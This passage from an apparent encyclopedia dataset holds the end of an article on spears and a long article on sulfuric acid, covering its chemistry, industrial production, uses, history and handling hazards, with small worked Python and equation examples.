kill it with spears. A variation of this technique, called the buffalo jump, was when a runner would lead the animals towards a cliff. As the buffalo got close to the cliff, other members of the tribe would jump out from behind rocks or trees and scare the buffalo over the cliff. Other hunters would be waiting at the bottom of the cliff to spear the animal to death. Hunting One of the earliest forms of killing prey for humans, hunting game with a spear and spear fishing continue to this day as both a means of catching food and as a cultural activity. Some of the most common prey for early humans were megafauna such as mammoths, which were hunted with various kinds of spear. One theory for the Quaternary extinction event is that most of these animals were hunted to extinction by humans with spears. Even after the invention of other hunting weapons such as the bow and sling, the spear continued to be used, either as a projectile weapon or by hand, such as in bear hunting and boar hunting. Types Barred spears: A barred spear has a crossbar beneath the blade, to prevent too deep a penetration of the spear into an animal. The bar may be forged as part of the spearhead or may be more loosely tied by means of loops below the blade. Barred spears are known from the Bronze Age, but the first historical record of their use in Europe is found in the writings of Xenophon in the 5th century BC. Examples also are shown in Roman art. In the Middle Ages, a winged or lugged war-spear was developed (see above), but the later Middle Ages saw the development of specialised types, such as the boar-spear and the bear-spear. The boar-spear could be used both on foot or horseback. Other types include the javelin, the harpoon, and the trident. Modern revival Spear hunting fell out of favor in most of Europe in the 18th century, but continued in Germany, enjoying a revival in the 1930s. Spear hunting is still practiced in the United States. Animals taken are primarily wild boar and deer, although trophy animals as large as Cape buffalo have been hunted with spears. Alligators are hunted in Florida with a type of harpoon.
Gymnastics One of the gymnastic exercises performed by the ancient Greeks was the throwing of a spear, referred to as ἀκοντισμός (akontismos). In myth and legend Symbolism Like many weapons, a spear may also be a symbol of power. The Celts would symbolically destroy a dead warrior's spear, either to prevent its use by another or as a sacrificial offering. In classical Greek mythology, Zeus' bolts of lightning may be interpreted as a symbolic spear. Some would carry that interpretation to the spear that is frequently associated with Athena, interpreting her spear as a symbolic connection to some of Zeus' power beyond the Aegis once he rose to replace other deities in the pantheon. Athena was depicted with a spear prior to that change in myths, however. Chiron's wedding gift to Peleus, when he married the nymph Thetis in classical Greek mythology, was an ashen spear, as the straight grain of ashwood made it an ideal choice of wood for a spear. The Romans and their early enemies would force prisoners to walk underneath a 'yoke of spears', which humiliated them. The yoke would consist of three spears, two upright with a third tied between them at a height which made the prisoners stoop. It has been suggested that the arrangement has a magical origin, a way to trap evil spirits. The word subjugate has its origins in this practice (from Latin sub = under, jugum = yoke). In Norse mythology, the god Odin's spear (named Gungnir) was made by the sons of Ivaldi. It had the special property that it never missed its mark. During the war with the Vanir, Odin symbolically threw Gungnir into the Vanir host. This practice of symbolically casting a spear into the enemy ranks at the start of a fight was sometimes used in historic clashes, to seek Odin's support in the coming battle. In Wagner's opera Siegfried, the haft of Gungnir is said to be from the "World-Tree" Yggdrasil. Other spears of religious significance are the Holy Lance and the Lúin of Celtchar, believed by some to have vast mystical powers. Sir James George Frazer in The Golden Bough noted the phallic nature of the spear and suggested that in the Arthurian legends the spear or lance functioned as a symbol of male fertility, paired with the Grail (as a symbol of female fertility). The Hindu god of war Murugan is worshipped by Tamils in the form of the spear called Vel, which is his primary weapon. The term spear is also used (in a somewhat archaic manner) to describe the male line of a family, as opposed to the distaff or female line. Legends Amenonuhoko, spear of Izanagi and Izanami, creator gods in Japanese mythology Gáe Bulg, spear of Cúchulainn, hero in Irish mythology Gáe Buide and Gáe Derg, spears of Diarmuid Ua Duibhne which could inflict wounds that none can recover from Green Dragon Crescent Blade, a guan dao wielded by General Guan Yu in the Romance of the Three Kingdoms Gungnir, spear of Odin, a god in Norse mythology Holy Lance, said to be the spear that pierced the side of Jesus Pelian Spear, a spear that only Achilles could wield, inherited from his father Peleus, made by Chiron from an ash tree on Mount Pelion. Rhongomyniad, referred to simply as Ron ("spear") in Geoffrey of Monmouth's History of Britain, the spear of King Arthur.
Serpent Spear, wielded by General Zhang Fei in the Romance of the Three Kingdoms Spear of Fuchai, the spear used by Goujian's arch-rival, King Fuchai of Wu, in China Spear of Lugh, named after Lugh, a god in Irish mythology Trident, a three-pronged fishing spear associated with a number of water deities, including the Etruscan Nethuns, Greek Poseidon, and Roman Neptune. Trishula, a three-pronged spear wielded by the Hindu deities Durga and Shiva Vel, a flattened broad-tipped spear used by the Hindu deity Murugan
Technology
Melee weapons
null
29247
https://en.wikipedia.org/wiki/Sulfuric%20acid
Sulfuric acid
Sulfuric acid (American spelling and the preferred IUPAC name) or sulphuric acid (Commonwealth spelling), known in antiquity as oil of vitriol, is a mineral acid composed of the elements sulfur, oxygen, and hydrogen, with the molecular formula H₂SO₄. It is a colorless, odorless, and viscous liquid that is miscible with water. Pure sulfuric acid does not occur naturally due to its strong affinity to water vapor; it is hygroscopic and readily absorbs water vapor from the air. Concentrated sulfuric acid is a strong oxidant with powerful dehydrating properties, making it highly corrosive towards other materials, from rocks to metals. Phosphorus pentoxide is a notable exception in that it is not dehydrated by sulfuric acid but, to the contrary, dehydrates sulfuric acid to sulfur trioxide. Upon addition of sulfuric acid to water, a considerable amount of heat is released; thus, the reverse procedure of adding water to the acid is generally avoided, since the heat released may boil the solution, spraying droplets of hot acid during the process. Upon contact with body tissue, sulfuric acid can cause severe acidic chemical burns and secondary thermal burns due to dehydration. Dilute sulfuric acid, lacking the oxidative and dehydrating properties, is substantially less hazardous, though it is still handled with care for its acidity. Many methods for its production are known, including the contact process, the wet sulfuric acid process, and the lead chamber process. Sulfuric acid is also a key substance in the chemical industry. It is most commonly used in fertilizer manufacture but is also important in mineral processing, oil refining, wastewater treating, and chemical synthesis. It has a wide range of end applications, including in domestic acidic drain cleaners, as an electrolyte in lead-acid batteries, as a dehydrating compound, and in various cleaning agents. Sulfuric acid can be obtained by dissolving sulfur trioxide in water. Physical properties Grades of sulfuric acid Although nearly 100% sulfuric acid solutions can be made, the subsequent loss of SO₃ at the boiling point brings the concentration to 98.3% acid. The 98.3% grade, which is more stable in storage, is the usual form of what is described as "concentrated sulfuric acid". Other concentrations are used for different purposes. "Chamber acid" and "tower acid" were the two concentrations of sulfuric acid produced by the lead chamber process, chamber acid being the acid produced in the lead chamber itself (<70% to avoid contamination with nitrosylsulfuric acid) and tower acid being the acid recovered from the bottom of the Glover tower. They are now obsolete as commercial concentrations of sulfuric acid, although they may be prepared in the laboratory from concentrated sulfuric acid if needed. In particular, "10 M" sulfuric acid (the modern equivalent of chamber acid, used in many titrations) is prepared by slowly adding 98% sulfuric acid to an equal volume of water, with good stirring: the temperature of the mixture can rise to 80 °C (176 °F) or higher. Pure sulfuric acid Pure sulfuric acid contains not only H₂SO₄ molecules but is actually an equilibrium mixture of many other chemical species. Sulfuric acid is a colorless oily liquid with a vapor pressure of <0.001 mmHg at 25 °C and 1 mmHg at 145.8 °C; 98% sulfuric acid has a vapor pressure of <1 mmHg at 40 °C. In the solid state, sulfuric acid is a molecular solid that forms monoclinic crystals with nearly trigonal lattice parameters.
The structure consists of layers parallel to the (010) plane, in which each molecule is connected by hydrogen bonds to two others. Hydrates H₂SO₄·nH₂O are known for n = 1, 2, 3, 4, 6.5, and 8, although most intermediate hydrates are stable against disproportionation. Polarity and conductivity Anhydrous H₂SO₄ is a very polar liquid, having a dielectric constant of around 100. It has a high electrical conductivity, a consequence of autoprotolysis, i.e. self-protonation: 2 H₂SO₄ ⇌ H₃SO₄⁺ + HSO₄⁻. The equilibrium constant for autoprotolysis (25 °C) is Kap = 2.7 × 10⁻⁴. The corresponding equilibrium constant for water, Kw, is 10⁻¹⁴, a factor of 10¹⁰ (10 billion) smaller. In spite of the viscosity of the acid, the effective conductivities of the H₃SO₄⁺ and HSO₄⁻ ions are high due to an intramolecular proton-switch mechanism (analogous to the Grotthuss mechanism in water), making sulfuric acid a good conductor of electricity. It is also an excellent solvent for many reactions. Chemical properties Acidity The hydration reaction of sulfuric acid is highly exothermic. As indicated by its acid dissociation constant, sulfuric acid is a strong acid: H₂SO₄ → H⁺ + HSO₄⁻, Ka1 ≈ 10³ (pKa1 ≈ −3). The product of this ionization is HSO₄⁻, the bisulfate anion. Bisulfate is a far weaker acid: HSO₄⁻ ⇌ H⁺ + SO₄²⁻, Ka2 = 0.01 (pKa2 = 2). The product of this second dissociation is SO₄²⁻, the sulfate anion. Dehydration Concentrated sulfuric acid has a powerful dehydrating property, removing water (H₂O) from other chemical compounds such as table sugar (sucrose) and other carbohydrates, to produce carbon, steam, and heat. Dehydration of table sugar (sucrose) is a common laboratory demonstration. The sugar darkens as carbon is formed, and a rigid column of black, porous carbon called a carbon snake may emerge. Similarly, mixing starch into concentrated sulfuric acid gives elemental carbon and water. The effect of this can also be seen when concentrated sulfuric acid is spilled on paper. Paper is composed of cellulose, a polysaccharide related to starch. The cellulose reacts to give a burnt appearance in which the carbon appears much like soot that results from fire. Although less dramatic, the action of the acid on cotton, even in diluted form, destroys the fabric. The reaction with copper(II) sulfate can also demonstrate the dehydration property of sulfuric acid: the blue crystals of the pentahydrate change into white anhydrous powder as water is removed. Reactions with salts Sulfuric acid reacts with most bases to give the corresponding sulfate or bisulfate. Aluminium sulfate, also known as papermaker's alum, is made by treating bauxite with sulfuric acid: Al₂O₃ + 3 H₂SO₄ → Al₂(SO₄)₃ + 3 H₂O. Sulfuric acid can also be used to displace weaker acids from their salts. Reaction with sodium acetate, for example, displaces acetic acid, CH₃COOH, and forms sodium bisulfate: CH₃COONa + H₂SO₄ → NaHSO₄ + CH₃COOH. Similarly, treating potassium nitrate with sulfuric acid produces nitric acid: KNO₃ + H₂SO₄ → KHSO₄ + HNO₃. Sulfuric acid reacts with sodium chloride, giving hydrogen chloride gas and sodium bisulfate: NaCl + H₂SO₄ → NaHSO₄ + HCl. When combined with nitric acid, sulfuric acid acts both as an acid and a dehydrating agent, forming the nitronium ion NO₂⁺, which is important in nitration reactions involving electrophilic aromatic substitution. This type of reaction, where protonation occurs on an oxygen atom, is important in many organic chemistry reactions, such as Fischer esterification and dehydration of alcohols. When allowed to react with superacids, sulfuric acid can act as a base and can be protonated, forming the H₃SO₄⁺ ion. Salts of H₃SO₄⁺ have been prepared (e.g.
trihydroxyoxosulfonium hexafluoroantimonate(V), [H₃SO₄]⁺[SbF₆]⁻) using the following reaction in liquid HF: ((CH₃)₃SiO)₂SO₂ + 3 HF + SbF₅ → [H₃SO₄][SbF₆] + 2 (CH₃)₃SiF. The above reaction is thermodynamically favored due to the high bond enthalpy of the Si–F bond in the side product. Protonation using simply fluoroantimonic acid, however, has met with failure, as pure sulfuric acid undergoes self-ionization to give H₃O⁺ ions, 2 H₂SO₄ ⇌ H₃O⁺ + HS₂O₇⁻, which prevents the conversion of H₂SO₄ to H₃SO₄⁺ by the HF/SbF₅ system. Reactions with metals Even diluted sulfuric acid reacts with many metals via a single displacement reaction, like other typical acids, producing hydrogen gas and salts (the metal sulfate). It attacks reactive metals (metals at positions above copper in the reactivity series) such as iron, aluminium, zinc, manganese, magnesium, and nickel. Concentrated sulfuric acid can serve as an oxidizing agent, releasing sulfur dioxide, for example with copper: Cu + 2 H₂SO₄ → CuSO₄ + SO₂ + 2 H₂O. Lead and tungsten, however, are resistant to sulfuric acid. Reactions with carbon and sulfur Hot concentrated sulfuric acid oxidizes carbon (as bituminous coal) and sulfur: C + 2 H₂SO₄ → CO₂ + 2 SO₂ + 2 H₂O, and S + 2 H₂SO₄ → 3 SO₂ + 2 H₂O. Electrophilic aromatic substitution Benzene and many derivatives undergo electrophilic aromatic substitution with sulfuric acid to give the corresponding sulfonic acids: C₆H₆ + H₂SO₄ → C₆H₅SO₃H + H₂O. Sulfur–iodine cycle Sulfuric acid can be used to produce hydrogen from water via the following reactions: I₂ + SO₂ + 2 H₂O → 2 HI + H₂SO₄ (120 °C, Bunsen reaction); 2 H₂SO₄ → 2 SO₂ + 2 H₂O + O₂ (830 °C); 2 HI → I₂ + H₂ (320 °C). The compounds of sulfur and iodine are recovered and reused, hence the process is called the sulfur–iodine cycle. This process is endothermic and must occur at high temperatures, so energy in the form of heat has to be supplied. The sulfur–iodine cycle has been proposed as a way to supply hydrogen for a hydrogen-based economy. It is an alternative to electrolysis, and does not require hydrocarbons like current methods of steam reforming. But note that all of the available energy in the hydrogen so produced is supplied by the heat used to make it. Occurrence Sulfuric acid is rarely encountered naturally on Earth in anhydrous form, due to its great affinity for water. Dilute sulfuric acid is a constituent of acid rain, which is formed by atmospheric oxidation of sulfur dioxide in the presence of water, i.e. oxidation of sulfurous acid. When sulfur-containing fuels such as coal or oil are burned, sulfur dioxide is the main byproduct (besides the chief products carbon oxides and water). Sulfuric acid is formed naturally by the oxidation of sulfide minerals, such as pyrite: 2 FeS₂ + 7 O₂ + 2 H₂O → 2 Fe²⁺ + 4 SO₄²⁻ + 4 H⁺. The resulting highly acidic water is called acid mine drainage (AMD) or acid rock drainage (ARD). The Fe²⁺ can be further oxidized to Fe³⁺: 4 Fe²⁺ + O₂ + 4 H⁺ → 4 Fe³⁺ + 2 H₂O. The Fe³⁺ produced can be precipitated as the hydroxide or hydrous iron oxide: Fe³⁺ + 3 H₂O → Fe(OH)₃ + 3 H⁺. The iron(III) ion ("ferric iron") can also oxidize pyrite: FeS₂ + 14 Fe³⁺ + 8 H₂O → 15 Fe²⁺ + 2 SO₄²⁻ + 16 H⁺. When iron(III) oxidation of pyrite occurs, the process can become rapid. pH values below zero have been measured in ARD produced by this process. ARD can also produce sulfuric acid at a slower rate, so that the acid neutralizing capacity (ANC) of the aquifer can neutralize the produced acid. In such cases, the total dissolved solids (TDS) concentration of the water can be increased from the dissolution of minerals from the acid-neutralization reaction with the minerals. Sulfuric acid is used as a defense by certain marine species; for example, the phaeophyte alga Desmarestia munda (order Desmarestiales) concentrates sulfuric acid in cell vacuoles.
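The low pH values quoted above can be illustrated with the dissociation constants given earlier. Treating the first dissociation as complete and solving the Ka2 equilibrium exactly gives the hydrogen-ion concentration; the following Python sketch is a simplified ideal-solution model (activity corrections, which matter at high concentrations, are ignored):

```python
import math

def h2so4_ph(c_total, ka2=0.01):
    # Approximate pH of c_total mol/L sulfuric acid. The first dissociation
    # is taken as complete; the second, HSO4- <-> H+ + SO4^2-, is solved
    # exactly from Ka2 = (c + x) * x / (c - x), i.e. the quadratic
    # x^2 + (c + Ka2) x - Ka2 c = 0 with x = [SO4^2-].
    c = c_total
    x = (-(c + ka2) + math.sqrt((c + ka2) ** 2 + 4.0 * ka2 * c)) / 2.0
    return -math.log10(c + x)

for c in (0.001, 0.01, 0.1):
    print(c, round(h2so4_ph(c), 2))
```

For 0.01 mol/L this model gives pH ≈ 1.85, between the limiting cases of single dissociation only (pH 2.0) and complete double dissociation (pH 1.7).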
Stratospheric aerosol In the stratosphere, the atmosphere's second layer, generally between 10 and 50 km above Earth's surface, sulfuric acid is formed by the oxidation of volcanic sulfur dioxide by the hydroxyl radical: SO₂ + OH· → HOSO₂·, then HOSO₂· + O₂ → HO₂· + SO₃, and finally SO₃ + H₂O → H₂SO₄. Because sulfuric acid reaches supersaturation in the stratosphere, it can nucleate aerosol particles and provide a surface for aerosol growth via condensation and coagulation with other water-sulfuric acid aerosols. This results in the stratospheric aerosol layer. Extraterrestrial sulfuric acid The permanent Venusian clouds produce a concentrated acid rain, as the clouds in the atmosphere of Earth produce water rain. Jupiter's moon Europa is also thought to have an atmosphere containing sulfuric acid hydrates. Manufacturing Sulfuric acid is produced from sulfur, oxygen and water via the conventional contact process (DCDA) or the wet sulfuric acid process (WSA). Contact process In the first step, sulfur is burned to produce sulfur dioxide: S + O₂ → SO₂. The sulfur dioxide is oxidized to sulfur trioxide by oxygen in the presence of a vanadium(V) oxide catalyst: 2 SO₂ + O₂ ⇌ 2 SO₃. This reaction is reversible and the formation of the sulfur trioxide is exothermic. The sulfur trioxide is absorbed into 97–98% H₂SO₄ to form oleum (H₂S₂O₇), also known as fuming sulfuric acid or pyrosulfuric acid: H₂SO₄ + SO₃ → H₂S₂O₇. The oleum is then diluted with water to form concentrated sulfuric acid: H₂S₂O₇ + H₂O → 2 H₂SO₄. Directly dissolving SO₃ in water is rarely practiced because the reaction is extremely exothermic, resulting in a hot aerosol of sulfuric acid that requires condensation and separation. Wet sulfuric acid process In the first step, sulfur is burned to produce sulfur dioxide: S + O₂ → SO₂ (−297 kJ/mol), or, alternatively, hydrogen sulfide (H₂S) gas is incinerated to SO₂ gas: 2 H₂S + 3 O₂ → 2 H₂O + 2 SO₂ (−1036 kJ/mol). The sulfur dioxide is then oxidized to sulfur trioxide using oxygen, with vanadium(V) oxide as catalyst: 2 SO₂ + O₂ ⇌ 2 SO₃ (−198 kJ/mol; the reaction is reversible). The sulfur trioxide is hydrated into sulfuric acid: SO₃ + H₂O → H₂SO₄(g) (−101 kJ/mol). The last step is the condensation of the sulfuric acid to liquid 97–98% H₂SO₄: H₂SO₄(g) → H₂SO₄(l) (−69 kJ/mol). Other methods Burning sulfur together with saltpeter (potassium nitrate, KNO₃), in the presence of steam, has been used historically. As saltpeter decomposes, it oxidizes the sulfur to SO₃, which combines with water to produce sulfuric acid. Prior to 1900, most sulfuric acid was manufactured by the lead chamber process. As late as 1940, up to 50% of sulfuric acid manufactured in the United States was produced by chamber process plants. A wide variety of laboratory syntheses are known, and typically begin from sulfur dioxide or an equivalent salt. In the metabisulfite method, hydrochloric acid reacts with metabisulfite to produce sulfur dioxide vapors. The gas is bubbled through nitric acid, which will release brown/red vapors of nitrogen dioxide as the reaction proceeds. The completion of the reaction is indicated by the ceasing of the fumes. This method conveniently does not produce an inseparable mist. Alternatively, sulfuric acid can be made by dissolving sulfur dioxide in an aqueous solution of an oxidizing metal salt such as copper(II) or iron(III) chloride: 2 FeCl₃ + 2 H₂O + SO₂ → 2 FeCl₂ + H₂SO₄ + 2 HCl. Two less well-known laboratory methods of producing sulfuric acid, albeit in dilute form and requiring some extra effort in purification, rely on electrolysis. A solution of copper(II) sulfate can be electrolyzed with a copper cathode and platinum/graphite anode to give spongy copper at the cathode and oxygen gas at the anode.
The solution of dilute sulfuric acid indicates completion of the reaction when it turns from blue to clear (production of hydrogen at the cathode is another sign):

2 CuSO4 + 2 H2O → 2 Cu + O2 + 2 H2SO4

More costly, dangerous, and troublesome is the electrobromine method, which employs a mixture of sulfur, water, and hydrobromic acid as the electrolyte. The sulfur is pushed to the bottom of the container under the acid solution. The copper cathode and platinum/graphite anode are then used, with the cathode near the surface and the anode positioned at the bottom of the electrolyte, to apply the current. This may take longer and emits toxic bromine/sulfur-bromide vapors, but the reactant acid is recyclable. Overall, only the sulfur and water are converted to sulfuric acid and hydrogen (omitting losses of acid as vapors):

S + 4 H2O → H2SO4 + 3 H2

The steps are:

2 HBr → H2 + Br2 (electrolysis of aqueous hydrogen bromide)
Br2 + Br⁻ ⇌ Br3⁻ (initial tribromide production, eventually reverses as Br2 is depleted)
2 S + Br2 → S2Br2 (bromine reacts with sulfur to form disulfur dibromide)
S2Br2 + 8 H2O + 5 Br2 → 2 H2SO4 + 12 HBr (oxidation and hydration of disulfur dibromide)

Uses
World production in the year 2004 was about 180 million tonnes, with the following geographic distribution: Asia 35%, North America (including Mexico) 24%, Africa 11%, Western Europe 10%, Eastern Europe and Russia 10%, Australia and Oceania 7%, South America 7%. Most of this amount (≈60%) is consumed for fertilizers, particularly superphosphates, ammonium phosphate and ammonium sulfates. About 20% is used in the chemical industry for production of detergents, synthetic resins, dyestuffs, pharmaceuticals, petroleum catalysts, insecticides and antifreeze, as well as in various processes such as oil-well acidizing, aluminium reduction, paper sizing, and water treatment. About 6% of uses are related to pigments and include paints, enamels, printing inks, coated fabrics and paper, while the rest is dispersed into a multitude of applications such as production of explosives, cellophane, acetate and viscose textiles, lubricants, non-ferrous metals, and batteries.

Industrial production of chemicals
The dominant use for sulfuric acid is in the "wet method" for the production of phosphoric acid, used for manufacture of phosphate fertilizers. In this method, phosphate rock is used, and more than 100 million tonnes are processed annually. This raw material is shown below as fluorapatite, though the exact composition may vary. It is treated with 93% sulfuric acid to produce calcium sulfate, hydrogen fluoride (HF) and phosphoric acid. The HF is removed as hydrofluoric acid. The overall process can be represented as:

Ca5F(PO4)3 + 5 H2SO4 + 10 H2O → 5 CaSO4·2H2O + HF + 3 H3PO4

Ammonium sulfate, an important nitrogen fertilizer, is most commonly produced as a byproduct from coking plants supplying the iron- and steel-making plants. Reacting the ammonia produced in the thermal decomposition of coal with waste sulfuric acid allows the ammonia to be crystallized out as a salt (often brown because of iron contamination) and sold into the agro-chemicals industry. Sulfuric acid is also important in the manufacture of dyestuff solutions.

Industrial cleaning agent
Sulfuric acid is used in steelmaking and other metallurgical industries as a pickling agent for removal of rust and fouling. Used acid is often recycled using a spent acid regeneration (SAR) plant. These plants combust spent acid with natural gas, refinery gas, fuel oil or other fuel sources. This combustion process produces gaseous sulfur dioxide (SO2) and sulfur trioxide (SO3), which are then used to manufacture "new" sulfuric acid.
Hydrogen peroxide (H2O2) can be added to sulfuric acid to produce piranha solution, a powerful but very toxic cleaning solution with which substrate surfaces can be cleaned. Piranha solution is typically used in the microelectronics industry, and also in laboratory settings to clean glassware.

Catalyst
Sulfuric acid is used for a variety of other purposes in the chemical industry. For example, it is the usual acid catalyst for the conversion of cyclohexanone oxime to caprolactam, used for making nylon. It is used for making hydrochloric acid from salt via the Mannheim process. Much is used in petroleum refining, for example as a catalyst for the reaction of isobutane with isobutylene to give isooctane, a compound that raises the octane rating of gasoline (petrol). Sulfuric acid is also often used as a dehydrating or oxidizing agent in industrial reactions, such as the dehydration of various sugars to form solid carbon.

Electrolyte
Sulfuric acid acts as the electrolyte in lead–acid batteries (lead–acid accumulator):

At anode: Pb + SO4²⁻ ⇌ PbSO4 + 2 e⁻
At cathode: PbO2 + 4 H⁺ + SO4²⁻ + 2 e⁻ ⇌ PbSO4 + 2 H2O
Overall: Pb + PbO2 + 4 H⁺ + 2 SO4²⁻ ⇌ 2 PbSO4 + 2 H2O

Domestic uses
Sulfuric acid at high concentrations is frequently the major ingredient in domestic acidic drain cleaners, which are used to remove lipids, hair, tissue paper, etc. Similar to their alkaline versions, such drain openers can dissolve fats and proteins via hydrolysis. Moreover, as concentrated sulfuric acid has a strong dehydrating property, it can remove tissue paper via dehydration as well. Since the acid reacts vigorously with water, such acidic drain openers should be added slowly into the pipe to be cleaned.

History

Vitriols
The study of vitriols (hydrated sulfates of various metals forming glassy minerals from which sulfuric acid can be derived) began in ancient times. The Sumerians had a list of types of vitriol that they classified according to the substances' color. Some of the earliest discussions of the origin and properties of vitriol are in the works of the Greek physician Dioscorides (first century AD) and the Roman naturalist Pliny the Elder (23–79 AD). Galen also discussed its medical use. Metallurgical uses for vitriolic substances were recorded in the Hellenistic alchemical works of Zosimos of Panopolis, in the treatise Phisica et Mystica, and the Leyden papyrus X. Medieval Islamic alchemists like the authors writing under the name of Jabir ibn Hayyan (died c. 806 – c. 816 AD, known in Latin as Geber), Abu Bakr al-Razi (865–925 AD, known in Latin as Rhazes), Ibn Sina (980–1037 AD, known in Latin as Avicenna), and Muhammad ibn Ibrahim al-Watwat (1234–1318 AD) included vitriol in their mineral classification lists.

Jabir ibn Hayyan, Abu Bakr al-Razi, Ibn Sina, et al.
The Jabirian authors and al-Razi experimented extensively with the distillation of various substances, including vitriols. In one recipe recorded in his Kitāb al-Asrār ('Book of Secrets'), al-Razi may have created sulfuric acid without being aware of it. In an anonymous Latin work variously attributed to Aristotle (under a title rendered 'Book of Aristotle'), to al-Razi (under a title rendered 'Great Light of Lights'), or to Ibn Sina, the author speaks of an 'oil' obtained through the distillation of iron(II) sulfate (green vitriol), which was likely 'oil of vitriol' or sulfuric acid. The work refers multiple times to Jabir ibn Hayyan's Seventy Books, one of the few Arabic Jabir works that were translated into Latin. The author of the version attributed to al-Razi also refers to the Seventy Books as his own work, showing that he erroneously believed them to be a work by al-Razi.
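The dehydrating action invoked above, both for sugars in industrial reactions and for tissue paper in drain cleaning, is illustrated by the classic sucrose demonstration; the specific reaction is a standard textbook example rather than one given in this text:

```latex
% Dehydration of sucrose by concentrated sulfuric acid: the acid removes
% the elements of water from the carbohydrate, leaving a plug of carbon.
\begin{equation}
\mathrm{C_{12}H_{22}O_{11}} \xrightarrow{\;\mathrm{H_2SO_4}\;} 12\,\mathrm{C} + 11\,\mathrm{H_2O}
\end{equation}
```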
There are several indications that the anonymous work was an original composition in Latin, although according to one manuscript it was translated by a certain Raymond of Marseilles, meaning that it may also have been a translation from the Arabic. According to Ahmad Y. al-Hassan, three recipes for sulfuric acid occur in an anonymous Garshuni manuscript containing a compilation taken from several authors and dating from an early period. One of them runs as follows: "The water of vitriol and sulphur which is used to irrigate the drugs: yellow vitriol three parts, yellow sulphur one part, grind them and distil them in the manner of rose-water." A recipe for the preparation of sulfuric acid is also mentioned in an Arabic treatise falsely attributed to the Shi'i Imam Ja'far al-Sadiq (died 765). Julius Ruska dated this treatise to the 13th century, but according to Ahmad Y. al-Hassan it likely dates from an earlier period: "Then distil green vitriol in a cucurbit and alembic, using medium fire; take what you obtain from the distillate, and you will find it clear with a greenish tint."

Vincent of Beauvais, Albertus Magnus, and pseudo-Geber
Sulfuric acid was called 'oil of vitriol' by medieval European alchemists because it was prepared by roasting iron(II) sulfate or green vitriol in an iron retort. The first allusions to it in works of European origin appear in the thirteenth century AD, as for example in the works of Vincent of Beauvais, in the Compositum de Compositis ascribed to Albertus Magnus, and in pseudo-Geber's Summa perfectionis.

Producing sulfuric acid from sulfur
A method of producing oleum sulphuris per campanam, or "oil of sulfur by the bell", was known by the 16th century: it involved burning sulfur under a glass bell in moist weather (or, later, under a moistened bell). However, it was very inefficient (according to Gesner, only a small fraction of the sulfur was converted into acid), and the resulting product was contaminated by sulfurous acid (or rather, a solution of sulfur dioxide), so most alchemists (including, for example, Isaac Newton) did not consider it equivalent to the "oil of vitriol". In the 17th century, Johann Rudolf Glauber discovered that adding saltpeter (potassium nitrate, KNO3) significantly improves the output, also replacing moisture with steam. As saltpeter decomposes, it oxidizes the sulfur to SO3, which combines with water to produce sulfuric acid. In 1736, Joshua Ward, a London pharmacist, used this method to begin the first large-scale production of sulfuric acid.

Lead chamber process
In 1746 in Birmingham, John Roebuck adapted this method to produce sulfuric acid in lead-lined chambers, which were stronger, less expensive, and could be made larger than the previously used glass containers. This process allowed the effective industrialization of sulfuric acid production. After several refinements, this method, called the lead chamber process or "chamber process", remained the standard for sulfuric acid production for almost two centuries.

Distillation of pyrite
Sulfuric acid created by John Roebuck's process approached a 65% concentration. Later refinements to the lead chamber process by French chemist Joseph Louis Gay-Lussac and British chemist John Glover improved the concentration to 78%. However, the manufacture of some dyes and other chemical processes require a more concentrated product. Throughout the 18th century, this could only be made by dry distilling minerals in a technique similar to the original alchemical processes.
Pyrite (iron disulfide, FeS2) was heated in air to yield iron(II) sulfate, FeSO4, which was oxidized by further heating in air to form iron(III) sulfate, Fe2(SO4)3, which, when heated to 480 °C, decomposed to iron(III) oxide and sulfur trioxide; the latter could be passed through water to yield sulfuric acid in any concentration. However, the expense of this process prevented the large-scale use of concentrated sulfuric acid.

Contact process
In 1831, British vinegar merchant Peregrine Phillips patented the contact process, which was a far more economical method for producing sulfur trioxide and concentrated sulfuric acid. Today, nearly all of the world's sulfuric acid is produced using this method. In the early to mid 19th century, "vitriol" plants existed, among other places, in Prestonpans in Scotland, Shropshire, and the Lagan Valley in County Antrim, Northern Ireland, where it was used as a bleach for linen. Early bleaching of linen was done using lactic acid from sour milk, but this was a slow process and the use of vitriol sped up the bleaching.

Safety

Laboratory hazards
Sulfuric acid is capable of causing very severe burns, especially when it is at high concentrations. In common with other corrosive acids and alkalis, it readily decomposes proteins and lipids through amide and ester hydrolysis upon contact with living tissues, such as skin and flesh. In addition, it exhibits a strong dehydrating action on carbohydrates, liberating extra heat and causing secondary thermal burns. Accordingly, it rapidly attacks the cornea and can induce permanent blindness if splashed onto the eyes. If ingested, it damages internal organs irreversibly and may even be fatal. Personal protective equipment should hence always be used when handling it. Moreover, its strong oxidizing property makes it highly corrosive to many metals and may extend its destructiveness to other materials. For these reasons, the damage posed by sulfuric acid is potentially more severe than that posed by other comparable strong acids, such as hydrochloric acid and nitric acid. Sulfuric acid must be stored carefully in containers made of nonreactive material (such as glass). Solutions equal to or stronger than 1.5 M are labeled "CORROSIVE", while solutions greater than 0.5 M but less than 1.5 M are labeled "IRRITANT". However, even the normal laboratory "dilute" grade (approximately 1 M, 10%) will char paper if left in contact for a sufficient time.

The standard first aid treatment for acid spills on the skin is, as for other corrosive agents, irrigation with large quantities of water. Washing is continued for at least ten to fifteen minutes to cool the tissue surrounding the acid burn and to prevent secondary damage. Contaminated clothing is removed immediately and the underlying skin washed thoroughly.

Dilution hazards
Preparation of diluted acid can be dangerous due to the heat released in the dilution process. To avoid splattering, the concentrated acid is usually added to water and not the other way around. A saying used to remember this is "Do like you oughta, add the acid to the water". Water has a higher heat capacity than the acid, so a vessel of cold water will absorb heat as acid is added. Also, because the acid is denser than water, it sinks to the bottom. Heat is generated at the interface between acid and water, which is at the bottom of the vessel. The acid will not boil, because of its higher boiling point. Warm water near the interface rises due to convection, which cools the interface and prevents boiling of either acid or water.
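The scale of the heat involved can be illustrated with a rough estimate. The sketch below is illustrative only: the integral heat of solution (taken as roughly 95 kJ per mole of H2SO4 at high dilution) and the heat capacity of the mixture (taken as that of water) are assumed round-number values, and heat losses to the surroundings are ignored:

```python
# Rough estimate of the temperature rise when 1 mol of concentrated
# sulfuric acid is added to 1 L of water. Assumed values: integral heat
# of solution ~95 kJ/mol at high dilution, and the heat capacity of the
# final mixture approximated as that of pure water.

HEAT_OF_SOLUTION = 95_000.0   # J released per mole of H2SO4 (assumed)
CP_MIXTURE = 4.18             # J/(g*K), approximated as pure water (assumed)
M_H2SO4 = 98.08               # g/mol

moles_acid = 1.0
mass_water = 1000.0                       # g (1 L of water)
mass_mixture = mass_water + moles_acid * M_H2SO4

heat_released = moles_acid * HEAT_OF_SOLUTION          # J
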